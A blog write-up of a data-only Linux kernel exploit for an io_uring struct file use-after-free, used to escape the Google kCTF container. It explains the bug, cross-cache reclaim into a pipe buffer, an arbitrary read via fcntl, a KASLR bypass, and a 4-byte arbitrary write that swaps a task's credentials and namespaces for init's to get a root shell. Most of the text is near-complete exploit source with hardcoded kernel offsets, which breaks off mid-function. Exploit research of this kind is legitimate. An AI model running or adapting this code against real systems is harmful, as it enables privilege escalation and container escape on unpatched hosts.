Escaping the Google kCTF Container with a Data-Only Exploit
Introduction
I’ve been doing some Linux kernel exploit development/study and vulnerability research off and on since last Fall and a few months ago I had some downtime on vacation to sit and challenge myself to write my first data-only exploit for a real bug that was exploited in kCTF. io_ring
has been a popular target in the program’s history up to this point, so I thought I’d find an easy-to-reason-about bug there that had already been exploited as fertile ground for exploit development creativity. The bug I chose to work with was one which resulted in a struct file
UAF where it was possible to hold an open file descriptor to the freed object. There have been quite a few write-ups on file
UAF exploits, so I decided as a challenge that my exploit had to be data-only. The parameters of the self-imposed challenge were completely arbitrary, but I just wanted to try writing an exploit that didn’t rely on hijacking control flow. I have written quite a few Linux kernel exploits of real kCTF bugs at this point, probably 5-6 as practice, just starting with the vulnerability and going from there, but all of them have ended up in me using ROP, so this was my first try at data-only. I also had not seen a data-only exploit for a struct file
UAF yet, which was encouraging as it seemed it was worthwile “research”. Also, before we get too far, please do not message me to tell me that someone already did xyz years prior. I’m very new to this type of thing and was just doing this as a personal challenge, if some aspects of the exploit are unoriginal, that is by coincidence. I will do my best to cite all my inspiration as we go.
The Bug
The bug is extremely simple (why can’t I find one like this?) and was exploited in kCTF in November of last year. I didn’t look very hard or ask around in the kCTF discord, but I was not able to find a PoC for this particular exploit. I was able to find several good write-ups of exploits leveraging similar vulnerabilities, especially this one by pqlpql and Awarau: https://ruia-ruia.github.io/2022/08/05/CVE-2022-29582-io-uring/.
I won’t go into the bug very much because it wasn’t really important to the excercise of being creative and writing a new kind of exploit (new for me); however, as you can tell from the patch, there was a call to put (decrease) a reference to a file without first checking if the file was a fixed file in the io_uring. There is this concept of fixed files which are managed by the io_uring itself, and there was this pattern throughout that codebase of doing checks on request files before putting them to ensure that they were not fixed files, and in this instance you can see that the check was not performed. So we are able from userspace to open a file (refcount == 1), register the file as a fixed file (recount == 2), call into the buggy code path by submitting an IORING_OP_MSG_RING
request which, upon completion will erroneously decrement the refcount (refcount == 1), and then finally, call io_uring_unregister_files
which ends up decrementing the recount to 0 and freeing the file while we still maintain an open file descriptor for it. This is about as good as bugs get. I need to find one of these.
What sort of variant analysis can we perform on this type of bug? I’m not so sure, it seems to be a broad category. But the careful code reviewer might have noticed that everywhere else in the codebase when there was the potential of putting a request file, the authors made sure to check if the file was fixed or not. This file put forgot to perform the check. The broad lesson I learned from this was to try and find instances of an action being performed multiple times in a codebase and look for descrepancies between those routines.
Giant Shoulders
It’s extremely important to stress that the blogpost I linked above from @pqlpql and @Awarau1 was very instrumental to this process. In that blogpost they broke-down in exquisite detail how to coerce the Linux kernel to free an entire page of file
objects back to the page allocator by utilizing a technique called “cross-cache”. file
structs have their own dedicated cache in the kernel and so typical object replacement shenanigans in UAF situations aren’t very useful in this instance, regardless of the struct file
size. Thanks to their blogpost, the concept of “cross-cache” has been used and discussed more and more, at least on Twitter from my anecdotal experience.
Instead of using this trick of getting our entire victim page of file
objects sent back to the page allocator only to have the page used as the backing for general cache objects, I elected to have the page reallocated in the form of the a pipe buffer. Please see this blogpost by @pqlpql for more information (this is a great writeup in general). This is an extremely powerful technique because we control all of the contents of the pipe buffer (via writes) and we can read 100% of the page contents (via reads). It’s also extremely reliable in my expierence. I’m not going to go into too much depth here because this wasn’t any of my doing, this is 100% the people mentioned thus far. Please go read the material from them.
Arbitrary Read
The first thing I started to look for, was a way to leak data, because I’ve been hardwired to think that all Linux kernel exploits follow the same pattern of achieving a leak which defeats KASLR, finding some valuable objects in memory, overwriting a function pointer blah blah blah. (Turns out this is not the case and some really talented people have really opened my mind in this area.) The only thing I knew for certain at this point was I have an open file descriptor at my disposal so let’s go looking around the file system code in the Linux kernel. One of the first things that caught my eye was the fcntl
syscall in fs/fcntl.c
. In general what I was doing at this point, was going through syscall tables for the Linux kernel and seeing which syscalls took an fd
as an argument. From there, I would visit the portion of the kernel codebase which handled that syscall implementation and I would ctrl-f
for the function copy_to_user
. This seemed like a relatively logical way to find a method of leaking data back to userspace.
The copy_to_user
function is a key part of the Linux kernel’s interface with user space. It’s used to copy data from the kernel’s own memory space into the memory space of a user process. This function ensures that the copy is done safely, respecting the separation between user and kernel memory.
Now if you go to the source code and do the find on copy_to_user
, the 2nd result is a snippet in this bit right here:
static long fcntl_rw_hint(struct file *file, unsigned int cmd,
unsigned long arg)
{
struct inode *inode = file_inode(file);
u64 __user *argp = (u64 __user *)arg;
enum rw_hint hint;
u64 h;
switch (cmd) {
case F_GET_RW_HINT:
h = inode->i_write_hint;
if (copy_to_user(argp, &h, sizeof(*argp)))
return -EFAULT;
return 0;
case F_SET_RW_HINT:
if (copy_from_user(&h, argp, sizeof(h)))
return -EFAULT;
hint = (enum rw_hint) h;
if (!rw_hint_valid(hint))
return -EINVAL;
inode_lock(inode);
inode->i_write_hint = hint;
inode_unlock(inode);
return 0;
default:
return -EINVAL;
}
}
You can see that in the F_GET_RW_HINT
case, a u64
(“h”), is copied back to userspace. That value comes from the value of inode->i_write_hint
. And inode
itself is returned from file_inode(file)
. The source code for that function is as follows:
static inline struct inode *file_inode(const struct file *f)
{
return f->f_inode;
}
Lol, well then. If we control the file
, then we control the inode
as well. A struct file
looks like this:
struct file {
union {
struct llist_node fu_llist;
struct rcu_head fu_rcuhead;
} f_u;
struct path f_path;
struct inode *f_inode; /* cached value */
<SNIP>
And since we’re using the pipe buffer as our replacement object (really the entire page), we can set inode
to be an arbitrary address. Let’s go check out the inode
struct and see what we can learn about this i_write_hint
member.
struct inode {
umode_t i_mode;
unsigned short i_opflags;
kuid_t i_uid;
kgid_t i_gid;
unsigned int i_flags;
#ifdef CONFIG_FS_POSIX_ACL
struct posix_acl *i_acl;
struct posix_acl *i_default_acl;
#endif
const struct inode_operations *i_op;
struct super_block *i_sb;
struct address_space *i_mapping;
#ifdef CONFIG_SECURITY
void *i_security;
#endif
/* Stat data, not accessed from path walking */
unsigned long i_ino;
/*
* Filesystems may only read i_nlink directly. They shall use the
* following functions for modification:
*
* (set|clear|inc|drop)_nlink
* inode_(inc|dec)_link_count
*/
union {
const unsigned int i_nlink;
unsigned int __i_nlink;
};
dev_t i_rdev;
loff_t i_size;
struct timespec64 i_atime;
struct timespec64 i_mtime;
struct timespec64 i_ctime;
spinlock_t i_lock; /* i_blocks, i_bytes, maybe i_size */
unsigned short i_bytes;
u8 i_blkbits;
u8 i_write_hint;
<SNIP>
So i_write_hint
is a u8
, aka, a single byte. This is perfect for what we need, inode
becomes the address from which we read a byte back to userland (plus the offset to the member).
Since we control 100% of the backing data of the file
, we thus control the value of the inode
member. So if we set up a fake file
struct in memory via our pipe buffer and have the inode
member be 0x1337
, the kernel will try to deref 0x1337
as an address and then read a byte at the offset of the i_write_hint
member. So this is an arbitrary read for us, and we found it in the dumbest way possible.
This was really encouraging for me that we found an arbitrary read gadget so quickly, but what should we aim the read at?
Finding a Read Target
So we can read data at any address we want, but we don’t know what to read. I struggled thinking about this for a while, but then remembered that the cpu_entry_area
was not randomized boot to boot, it is always at the same address. I knew this from the above blogpost about the file
UAF, but also vaguely from @ky1ebot tweets like this one.
cpu_entry_area
is a special per-CPU area in the kernel that is used to handle some types of interrupts and exceptions. There is this concept of Interrupt Stacks in the kernel that can be used in the event that an exception must be handled for instance.
After doing some debugging with GDB, I noticed that there was at least one kernel text pointer that showed up in the cpu_entry_area
consistently and that was an address inside the error_entry
function which is as follows:
SYM_CODE_START_LOCAL(error_entry)
UNWIND_HINT_FUNC
PUSH_AND_CLEAR_REGS save_ret=1
ENCODE_FRAME_POINTER 8
testb $3, CS+8(%rsp)
jz .Lerror_kernelspace
/*
* We entered from user mode or we're pretending to have entered
* from user mode due to an IRET fault.
*/
swapgs
FENCE_SWAPGS_USER_ENTRY
/* We have user CR3. Change to kernel CR3. */
SWITCH_TO_KERNEL_CR3 scratch_reg=%rax
IBRS_ENTER
UNTRAIN_RET
leaq 8(%rsp), %rdi /* arg0 = pt_regs pointer */
.Lerror_entry_from_usermode_after_swapgs:
/* Put us onto the real thread stack. */
call sync_regs
RET
<SNIP>
error_entry
seemed to be used as an entry point for handling various exceptions and interrupts, so it made sense to me that an offset inside the function, might be found on what I was guessing was an interrupt stack in the cpu_entry_area
. The address was the address of the call sync_regs
portion of the function. I was never able to confirm what types of common exceptions/interrupts would’ve been taking place on the system that was pushing that address onto the stack presumably when the call
was executed, but maybe someone can chime in and correct me if I’m wrong about this portion of the exploit. It made sense to me at least and the address’ presence in the cpu_entry_area
was extremely common to the point that it was never absent during my testing. Armed with a kernel text address at a known offset, we could now defeat KASLR with our arbitrary read. At this point we have the read, the read target, and KASLR defeated.
Again, this portion didn’t take very long to figure out because I had just been introduced to cpu_entry_area
by the aforementioned blogposts at the time.
Where are the Write Gadgets?
I actually struggled to find a satisfactory write gadget for a few days. I was kind of spoiled by my experience finding my arbitrary read gadget and thought this would be a similarly easy search. I followed roughly the same process of going through syscalls which took an fd
as an argument and tracing through them looking for calls to copy_to_user
, but I didn’t have the same luck. During this time, I was discussing the topic with my very talented friend @Firzen14 and he brought up this concept here: https://googleprojectzero.blogspot.com/2022/11/a-very-powerful-clipboard-samsung-in-the-wild-exploit-chain.html#h.yfq0poarwpr9. In the P0 blogpost, they talk about how the signalfd_ctx
of a signalfd
file is stored in the f.file->private_data
field and how the signalfd
syscalls allows the attacker to perform a write of the ctx->sigmask
. So in our situation, since we control the entire fake file contents, forging a fake signalfd_ctx
in memory would be quite easy since we have access to an entire page of memory.
I couldn’t use this technique for my personally imposed challenge though since the technique was already published. But this did open my eyes to the concept of storing contexts and objects in the private_data
field of our struct file
. So at this point, I went hunting for usages of private_data
in the kernel code base. As you can see, the member is used in many many places: https://elixir.bootlin.com/linux/latest/C/ident/private_data.
This was very encouraging to me since I was bound to find some way to achieve an arbitrary write with so many instances of the member being used in so many different code paths; however, I still struggled a while finding a suitable gadget. Finally, I decided to look back at io_uring
itself.
Looking for instances where the file->private_data
was used, I quickly found an instance right in the very function that was related to the bug. In io_msg_ring
, you can see that a target_ctx
of type io_ring_ctx
is derived from the req->file->private
data. Since we control the fake file
, we control can control the private_data
contents (a pointer to a fake io_ring_ctx
in this case).
io_msg_ring
is used to pass data from one io ring to another, and you can see that in io_fill_cqe_aux
, we actually retrieve a io_uring_cqe
struct from our potentially faked io_uring_ctx
via io_get_cqe
. Immediately, we see several WRITE_ONCE
macros used to write data to this object. This was looking extremely promising. I initially was going to use this write as my gadget, but as you will see later, the write sequences and the offsets at which they occur, didn’t really fit my exploitation plan. So for now, we’ll find a 2nd write in the same code path.
Immediately after the call to io_fill_cqe_aux
, there is one to io_commit_cqring
using our faked io_uring_ctx
:
static inline void io_commit_cqring(struct io_ring_ctx *ctx)
{
/* order cqe stores with ring update */
smp_store_release(&ctx->rings->cq.tail, ctx->cached_cq_tail);
}
This is basically a memcpy
, we write the contents of ctx->cached_cq_tail
(100% user-controlled) to &ctx->ring->cq.tail
(100% user-controlled). The size of the write in this case is 4 bytes. So we have achieved an arbitrary 4 byte write. From here, it just boils down to what type of exploit you want to write, so I decided to do one I had never done in the spirit of my self-imposed challenge.
Exploitation Plan
Now that we have all the possible tools we could need, it was time to start crafting an exploitation plan. In the kCTF environment you are running as an unprivileged user inside of a container, and your goal is to escape the container and read the flag value from the host file system.
I honestly had no idea where to start in this regard, but luckily there are some good articles out there explaining the situation. This post from Cyberark was extremely helpful in understanding how containerization of a task is achieved in the kernel. And I also got some very helpful pointers from Andy Nguyen’s blog post on his kCTF exploit. Huge thanks to Andy for being one of the few to actually detail their steps for escaping the container.
Finding Init
At this point, my goal is to find the host Init task_struct
in memory and find the value of a few important members: real_cred
, cred
, and nsproxy
. real_cred
is used to track the user and group IDs that were originally responsible for creating the process and unlike cred
, real_cred
remains constant and does not change due to things like setuid
. cred
is used to convey the “effective” credentials of a task, like the effective user ID for instance. Finally, and super importantly because we are trapped in a container, nsproxy
is a pointer to a struct that contains all of the information about our task’s namespaces like network, mount, IPC, etc. All of these members are pointers, so if we are able to find their values via our arbitrary read, we should then be able to overwrite our own credentials and namespace in our task_struct
. Luckily, the address of the init
task is a constant offset from the kernel base, so once we broke KASLR with our read of the error_entry
address, we can then copy those values with our arbitrary read capability since they would reside at known addresses (offsets from the init
task symbol).
Forging Objects
With those values in hand, we now need to find our own task_struct
in memory so that we can overwrite our members with those of init
. To do this, I took advantage of the fact that the task_struct
has a linked list of tasks on the system. So early in the exploit, I spawn a child process with a known name, this name fits within the task_struct
comm
field, and so as I traverse through the linked list of tasks on the system, I just simply check each task’s comm
field for my easily identifiable child process. You can see how I do that in this code snippet:
void traverse_tasks(void)
{
// Process name buf
char current_comm[16] = { 0 };
// Get the next task after init
uint64_t current_next = read_8_at(g_init_task + TASKS_NEXT_OFF);
uint64_t current = current_next - TASKS_NEXT_OFF;
if (!task_valid(current))
{
err("Invalid task after init: 0x%lx", current);
}
// Read the comm
read_comm_at(current + COMM_OFF, current_comm);
//printf(" - Address: 0x%lx, Name: '%s'\n", current, current_comm);
// While we don't have NULL, traverse the list
while (task_valid(current))
{
current_next = read_8_at(current_next);
current = current_next - TASKS_NEXT_OFF;
if (current == g_init_task) { break; }
// Read the comm
read_comm_at(current + COMM_OFF, current_comm);
//printf(" - Address: 0x%lx, Name: '%s'\n", current, current_comm);
// If we find the target comm, save it
if (!strcmp(current_comm, TARGET_TASK))
{
g_target_task = current;
}
// If we find our target comm, save it
if (!strcmp(current_comm, OUR_TASK))
{
g_our_task = current;
}
}
}
You can also see that not only did we find our target task, we also found our own task in memory. This is important for the way I chose to exploit this bug because, remember that we need to fake a few objects in memory, like the io_uring_ctx
for instance. Usually this done by crafting objects in the kernel heap and somehow discoverying their address with a leak. In my case, I have a whole pipe buffer which is 4096 bytes of memory to utilize. The only problem is, I have no idea where it is. But I do know that I have an open file descriptor to it, and I know that each task has a file descriptor table inside of its files
member. After some time printk
some offsets, I was able to traverse through my own task’s file descriptor table and learn the address of my pipe buffer. This is because the pipe buffer page is obviously page aligned so I can just page align the address we read from the file descriptor table as the address of our UAF file. So now I know exactly in memory where my pipe buffer is, and I also know what offset onto that page our UAF struct file
resides. I have a small helper function to set a “scratch space” region address as a global and then use that memory to set up our fake io_uring_ctx
. You can see those functions here, first finding our pipe buffer address:
void find_pipe_buf_addr(void)
{
// Get the base of the files array
uint64_t files_ptr = read_8_at(g_file_array);
// Adjust the files_ptr to point to our fd in the array
files_ptr += (sizeof(uint64_t) * g_uaf_fd);
// Get the address of our UAF file struct
uint64_t curr_file = read_8_at(files_ptr);
// Calculate the offset
g_off = curr_file & 0xFFF;
// Set the globals
g_file_addr = curr_file;
g_pipe_buf = g_file_addr - g_off;
return;
}
And then determining the location of our scratch space where we will forge the fake io_uring_ctx
:
// Here, all we're doing is determing what side of the page the UAF file is on,
// if its on the front half of the page, the back half is our scratch space
// and vice versa
void set_scratch_space(void)
{
g_scratch = g_pipe_buf;
if (g_off < 0x500) { g_scratch += 0x500; }
}
Now we have one more read to do and this is really just to make the exploit easier. In order to avoid a lot of debugging while triggering my write, I need to make sure that my fake io_uring_ctx
contains as many valid fields as necessary. If you start with a completely NULL
object, you will have to troubleshoot every NULL-deref kernel panic and determine where you went wrong and what kind of value that member should have had. Instead, I chose to copy a legitimate instance of a real io_uring_ctx
instead by reading and copying its contents to a global buffer. Working now from a good base, our forged object can then be set-up properly to perform our arbitrary write from, you can see me using the copy and updating the necessary fields here:
void write_setup_ctx(char *buf, uint32_t what, uint64_t where)
{
// Copy our copied real ring fd
memcpy(&buf[g_off], g_ring_copy, 256);
// Set f->f_count to 1
uint64_t *count = (uint64_t *)&buf[g_off + 0x38];
*count = 1;
// Set f->private_data to our scratch space
uint64_t *private_data = (uint64_t *)&buf[g_off + 0xc8];
*private_data = g_scratch;
// Set ctx->cqe_cached
size_t cqe_cached = g_scratch + 0x240;
cqe_cached &= 0xFFF;
uint64_t *cached_ptr = (uint64_t *)&buf[cqe_cached];
*cached_ptr = NULL_MEM;
// Set ctx->cqe_sentinel
size_t cqe_sentinel = g_scratch + 0x248;
cqe_sentinel &= 0xFFF;
uint64_t *sentinel_ptr = (uint64_t *)&buf[cqe_sentinel];
// We need ctx->cqe_cached < ctx->cqe_sentinel
*sentinel_ptr = NULL_MEM + 1;
// Set ctx->rings so that ctx->rings->cq.tail is written to. That is at
// offset 0xc0 from cq base address
size_t rings = g_scratch + 0x10;
rings &= 0xFFF;
uint64_t *rings_ptr = (uint64_t *)&buf[rings];
*rings_ptr = where - 0xc0;
// Set ctx->cached_cq_tail which is our what
size_t cq_tail = g_scratch + 0x250;
cq_tail &= 0xFFF;
uint32_t *cq_tail_ptr = (uint32_t *)&buf[cq_tail];
*cq_tail_ptr = what;
// Set ctx->cq_wait the list head to itself (so that it's "empty")
size_t real_cq_wait = g_scratch + 0x268;
size_t cq_wait = (real_cq_wait & 0xFFF);
uint64_t *cq_wait_ptr = (uint64_t *)&buf[cq_wait];
*cq_wait_ptr = real_cq_wait;
}
Performing Our Writes
Now, it’s time to do our writes. Remember those three sequential writes we were going to use inside of io_fill_cqe_aux
, but I said they wouldn’t work with the exploit plan? Well the reason was, those three writes were as follows:
cqe = io_get_cqe(ctx);
if (likely(cqe)) {
WRITE_ONCE(cqe->user_data, user_data);
WRITE_ONCE(cqe->res, res);
WRITE_ONCE(cqe->flags, cflags);
They worked really well until I went to overwrite the target nsproxy
member of our target child task_struct
. One of those writes inevitably overwrote the members right next to nsproxy
: signal
and sighand
. This caused big problems for me because as interrupts occurred, those members (pointers) would be deref’d and cause the kernel to panic since they were invalid values. So I opted to just the 4-byte write instead inside io_commit_cqring
. The 4-byte write also caused problems in that at some points current
has it’s creds checked and with what basically amounted to a torn 8-byte write, we would leave current
cred values in invalid states during these checks. This is why I had to use a child process. Huge shoutout to @pqlpql for tipping me off to this.
Now we can just use those same steps to overwrite the three members real_cred
, cred
, and nsproxy
and now our child has all of the same privileges and capabilities including visiblity into the host root file system that init
does. This is perfect, but I still wasn’t able to get the flag!
I started to panic at this point that I had seriously done something wrong. The exploit if FULL of paranoid checks: I reread every overwritten value to make sure it’s correct for instance, so I was confident that I had done the writes properly. It felt like my namespace was somehow not effective yet in the child process, like it was cached somewhere. But then I remembered in Andy Nguyen’s blog post, he used his root
privileges to explictly set his namespace values with calls to setns
. Once I added this step, the child was able to see the root file system and find the flag. Instead of giving my child the same namespaces as init
, I was able to give it the same namespaces of itself lol. I still haven’t followed through on this to determine how setns
is implemented, but this could probably be done without explicit setns
calls and only with our read and write tools:
// Our child waits to be given super powers and then drops into shell
void child_exec(void)
{
// Change our taskname
if (prctl(PR_SET_NAME, TARGET_TASK, NULL, NULL, NULL) != 0)
{
err("`prctl()` failed");
}
while (1)
{
if (*(int *)g_shmem == 0x1337)
{
sleep(3);
info("Child dropping into root shell...");
if (setns(open("/proc/self/ns/mnt", O_RDONLY), 0) == -1) { err("`setns()`"); }
if (setns(open("/proc/self/ns/pid", O_RDONLY), 0) == -1) { err("`setns()`"); }
if (setns(open("/proc/self/ns/net", O_RDONLY), 0) == -1) { err("`setns()`"); }
char *args[] = {"/bin/sh", NULL, NULL};
execve(args[0], args, NULL);
}
else { sleep(2); }
}
}
And finally I was able to drop into a root
shell and capture the flag, escaping the container. One huge obstacle when I tried using my exploit on the Google infrastructure was that their kernel was compiled with SELinux support and my test environment was not. This ended up not being a big deal, I had some out of band confirmation/paranoia checks I had to leave out but fortunately the arbitrary read we used isn’t actually hooked in any way by SELinux unlike most of the other fcntl
syscall flags. At that point remember, we don’t know enough information to fake any objects in memory so I’d be dead in the water if that read method was ruined by SELinux.
Conclusion
This was a lot of fun for me and I was able to learn a lot. I think these types of learning challenges are great and low-stakes. They can be fun to work on with friends as well, big thanks to everyone mentioned already and also @chompie1337 who had to listen to me freak out about not being able to read the flag once I had overwritten my creds. The exploit is posted below in full, let me know if you have any trouble understanding any of it, thanks.
// Compile
// gcc sploit.c -o sploit -l:liburing.a -static -Wall
#define _GNU_SOURCE
#include <sched.h>
#include <stdio.h>
#include <stdlib.h>
#include <errno.h>
#include <stdarg.h>
#include <fcntl.h>
#include <string.h>
#include <unistd.h>
#include <sys/time.h>
#include <sys/resource.h>
#include <sys/msg.h>
#include <sys/timerfd.h>
#include <sys/mman.h>
#include <sys/prctl.h>
#include "liburing.h"
// /sys/kernel/slab/filp/objs_per_slab
#define OBJS_PER_SLAB 16UL
// /sys/kernel/slab/filp/cpu_partial
#define CPU_PARTIAL 52UL
// Multiplier for cross-cache arithmetic
#define OVERFLOW_FACTOR 2UL
// Largest number of objects we could allocate per Cross-cache step
#define CROSS_CACHE_MAX 8192UL
// Fixed mapping in cpu_entry_area whose contents is NULL
#define NULL_MEM 0xfffffe0000002000UL
// Reading side of pipe
#define PIPE_READ 0
// Writing side of pipe
#define PIPE_WRITE 1
// error_entry inside cpu_entry_area pointer
#define ERROR_ENTRY_ADDR 0xfffffe0000002f48UL
// Offset from `error_entry` pointer to kernel base
#define EE_OFF 0xe0124dUL
// Kernel text signature
#define KERNEL_SIGNATURE 0x4801803f51258d48UL
// Offset from kernel base to init_task
#define INIT_OFF 0x18149c0UL
// Offset from task to task->comm
#define COMM_OFF 0x738UL
// Offset from task to task->real_cred
#define REAL_CRED_OFF 0x720UL
// Offset from task to task->cred
#define CRED_OFF 0x728UL
// Offset from task to task->nsproxy
#define NSPROXY_OFF 0x780UL
// Offset from task to task->files
#define FILES_OFF 0x770UL
// Offset from task->files to &task->files->fdt
#define FDT_OFF 0x20UL
// Offset from &task->files->fdt to &task->files->fdt->fd
#define FD_ARRAY_OFF 0x8UL
// Offset from task to task->tasks.next
#define TASKS_NEXT_OFF 0x458UL
// Process name to give root creds to
#define TARGET_TASK "blegh2"
// Our process name
#define OUR_TASK "blegh1"
// Offset from kernel base to io_uring_fops
#define FOPS_OFF 0x1220200UL
// Shared memory with child
void *g_shmem;
// Child pid
pid_t g_child = -1;
// io_uring instance to use
struct io_uring g_ring = { 0 };
// UAF file handle
int g_uaf_fd = -1;
// Track pipes
struct fd_pair {
int fd[2];
};
struct fd_pair g_pipe = { 0 };
// The offset on the page where our `file` is
size_t g_off = 0;
// Our fake file that is a copy of a legit io_uring fd
unsigned char g_ring_copy[256] = { 0 };
// Keep track of files added in Cross-cache steps
int g_cc1_fds[CROSS_CACHE_MAX] = { 0 };
size_t g_cc1_num = 0;
int g_cc2_fds[CROSS_CACHE_MAX] = { 0 };
size_t g_cc2_num = 0;
int g_cc3_fds[CROSS_CACHE_MAX] = { 0 };
size_t g_cc3_num = 0;
// Gadgets and offsets
uint64_t g_kern_base = 0;
uint64_t g_init_task = 0;
uint64_t g_target_task = 0;
uint64_t g_our_task = 0;
uint64_t g_cred_what = 0;
uint64_t g_nsproxy_what = 0;
uint64_t g_cred_where = 0;
uint64_t g_real_cred_where = 0;
uint64_t g_nsproxy_where = 0;
uint64_t g_files = 0;
uint64_t g_fdt = 0;
uint64_t g_file_array = 0;
uint64_t g_file_addr = 0;
uint64_t g_pipe_buf = 0;
uint64_t g_scratch = 0;
uint64_t g_fops = 0;
void err(const char* format, ...)
{
if (!format) {
exit(EXIT_FAILURE);
}
fprintf(stderr, "%s", "[!] ");
va_list args;
va_start(args, format);
vfprintf(stderr, format, args);
va_end(args);
fprintf(stderr, ": %s\n", strerror(errno));
sleep(5);
exit(EXIT_FAILURE);
}
void info(const char* format, ...)
{
if (!format) {
return;
}
fprintf(stderr, "%s", "[*] ");
va_list args;
va_start(args, format);
vfprintf(stderr, format, args);
va_end(args);
fprintf(stderr, "%s", "\n");
}
// Get FD for test file
int get_test_fd(int victim)
{
// These are just different for kernel debugging purposes
char *file = NULL;
if (victim) { file = "/etc//passwd"; }
else { file = "/etc/passwd"; }
int fd = open(file, O_RDONLY);
if (fd < 0)
{
err("`open()` failed, file: %s", file);
}
return fd;
}
// Set-up the file that we're going to use as our victim object
void alloc_victim_filp(void)
{
// Open file to register
g_uaf_fd = get_test_fd(1);
info("Victim fd: %d", g_uaf_fd);
// Register the file
int ret = io_uring_register_files(&g_ring, &g_uaf_fd, 1);
if (ret)
{
err("`io_uring_register_files()` failed");
}
// Get hold of the sqe
struct io_uring_sqe *sqe = NULL;
sqe = io_uring_get_sqe(&g_ring);
if (!sqe)
{
err("`io_uring_get_sqe()` failed");
}
// Init sqe vals
sqe->opcode = IORING_OP_MSG_RING;
sqe->fd = 0;
sqe->flags |= IOSQE_FIXED_FILE;
ret = io_uring_submit(&g_ring);
if (ret < 0)
{
err("`io_uring_submit()` failed");
}
struct io_uring_cqe *cqe;
ret = io_uring_wait_cqe(&g_ring, &cqe);
}
// Set CPU affinity for calling process/thread
void pin_cpu(long cpu_id)
{
cpu_set_t mask;
CPU_ZERO(&mask);
CPU_SET(cpu_id, &mask);
if (sched_setaffinity(0, sizeof(mask), &mask) == -1)
{
err("`sched_setaffinity()` failed: %s", strerror(errno));
}
return;
}
// Increase the number of FDs we can have open
void increase_fds(void)
{
struct rlimit old_lim, lim;
if (getrlimit(RLIMIT_NOFILE, &old_lim) != 0)
{
err("`getrlimit()` failed: %s", strerror(errno));
}
lim.rlim_cur = old_lim.rlim_max;
lim.rlim_max = old_lim.rlim_max;
if (setrlimit(RLIMIT_NOFILE, &lim) != 0)
{
err("`setrlimit()` failed: %s", strerror(errno));
}
info("Increased fd limit from %d to %d", old_lim.rlim_cur, lim.rlim_cur);
return;
}
void create_pipe(void)
{
if (pipe(g_pipe.fd) == -1)
{
err("`pipe()` failed");
}
}
void release_pipe(void)
{
close(g_pipe.fd[PIPE_WRITE]);
close(g_pipe.fd[PIPE_READ]);
}
// Our child waits to be given super powers and then drops into shell
void child_exec(void)
{
// Change our taskname
if (prctl(PR_SET_NAME, TARGET_TASK, NULL, NULL, NULL) != 0)
{
err("`prctl()` failed");
}
while (1)
{
if (*(int *)g_shmem == 0x1337)
{
sleep(3);
info("Child dropping into root shell...");
if (setns(open("/proc/self/ns/mnt", O_RDONLY), 0) == -1) { err("`setns()`"); }
if (setns(open("/proc/self/ns/pid", O_RDONLY), 0) == -1) { err("`setns()`"); }
if (setns(open("/proc/self/ns/net", O_RDONLY), 0) == -1) { err("`setns()`"); }
char *args[] = {"/bin/sh", NULL, NULL};
execve(args[0], args, NULL);
}
else { sleep(2); }
}
}
// Set-up environment for exploit
void setup_env(void)
{
// Make sure a page is a page and we're not on some bullshit machine
long page_sz = sysconf(_SC_PAGESIZE);
if (page_sz != 4096L)
{
err("Page size was: %ld", page_sz);
}
// Pin to CPU 0
pin_cpu(0);
info("Pinned process to core-0");
// Increase FD limit
increase_fds();
// Create shared mem
g_shmem = mmap(
(void *)0x1337000,
page_sz,
PROT_READ | PROT_WRITE,
MAP_ANONYMOUS | MAP_FIXED | MAP_SHARED,
-1,
0
);
if (g_shmem == MAP_FAILED) { err("`mmap()` failed"); }
info("Shared memory @ 0x%lx", g_shmem);
// Create child
g_child = fork();
if (g_child == -1)
{
err("`fork()` failed");
}
// Child
if (g_child == 0)
{
child_exec();
}
info("Spawned child: %d", g_child);
// Change our name
if (prctl(PR_SET_NAME, OUR_TASK, NULL, NULL, NULL) != 0)
{
err("`prctl()` failed");
}
// Create io ring
struct io_uring_params params = { 0 };
if (io_uring_queue_init_params(8, &g_ring, ¶ms))
{
err("`io_uring_queue_init_params()` failed");
}
info("Created io_uring");
// Create pipe
info("Creating pipe...");
create_pipe();
}
// Decrement file->f_count to 0 and free the filp
void do_uaf(void)
{
if (io_uring_unregister_files(&g_ring))
{
err("`io_uring_unregister_files()` failed");
}
// Let the free actually happen
usleep(100000);
}
// Cross-cache 1:
// Allocate enough objects that we have definitely allocated enough
// slabs to fill up the partial list later when we free an object from each
// slab
void cc_1(void)
{
// Calculate the amount of objects to spray
uint64_t spray_amt = (OBJS_PER_SLAB * (CPU_PARTIAL + 1)) * OVERFLOW_FACTOR;
g_cc1_num = spray_amt;
// Paranoid
if (spray_amt > CROSS_CACHE_MAX) { err("Illegal spray amount"); }
//info("Spraying %lu `filp` objects...", spray_amt);
for (uint64_t i = 0; i < spray_amt; i++)
{
g_cc1_fds[i] = get_test_fd(0);
}
usleep(100000);
return;
}
// Cross-cache 2:
// Allocate OBJS_PER_SLAB to *probably* create a new active slab
void cc_2(void)
{
// Step 2:
// Allocate OBJS_PER_SLAB to *probably* create a new active slab
uint64_t spray_amt = OBJS_PER_SLAB - 1;
g_cc2_num = spray_amt;
//info("Spraying %lu `filp` objects...", spray_amt);
for (uint64_t i = 0; i < spray_amt; i++)
{
g_cc2_fds[i] = get_test_fd(0);
}
usleep(100000);
return;
}
// Cross-cache 3:
// Allocate enough objects to definitely fill the rest of the active slab
// and start a new active slab
void cc_3(void)
{
uint64_t spray_amt = OBJS_PER_SLAB + 1;
g_cc3_num = spray_amt;
//info("Spraying %lu `filp` objects...", spray_amt);
for (uint64_t i = 0; i < spray_amt; i++)
{
g_cc3_fds[i] = get_test_fd(0);
}
usleep(100000);
return;
}
// Cross-cache 4:
// Free all the filps from steps 2, and 3. This will place our victim
// page in the partial list completely empty
void cc_4(void)
{
//info("Freeing `filp` objects from CC2 and CC3...");
for (size_t i = 0; i < g_cc2_num; i++)
{
close(g_cc2_fds[i]);
}
for (size_t i = 0; i < g_cc3_num; i++)
{
close(g_cc3_fds[i]);
}
usleep(100000);
return;
}
// Cross-cache 5:
// Free an object for each slab we allocated in Step 1 to overflow the
// partial list and get our empty slab in the partial list freed
void cc_5(void)
{
//info("Freeing `filp` objects to overflow CPU partial list...");
for (size_t i = 0; i < g_cc1_num; i++)
{
if (i % OBJS_PER_SLAB == 0)
{
close(g_cc1_fds[i]);
}
}
usleep(100000);
return;
}
// Reset all state associated with a cross-cache attempt
void cc_reset(void)
{
// Close all the remaining FDs
info("Resetting cross-cache state...");
for (size_t i = 0; i < CROSS_CACHE_MAX; i++)
{
close(g_cc1_fds[i]);
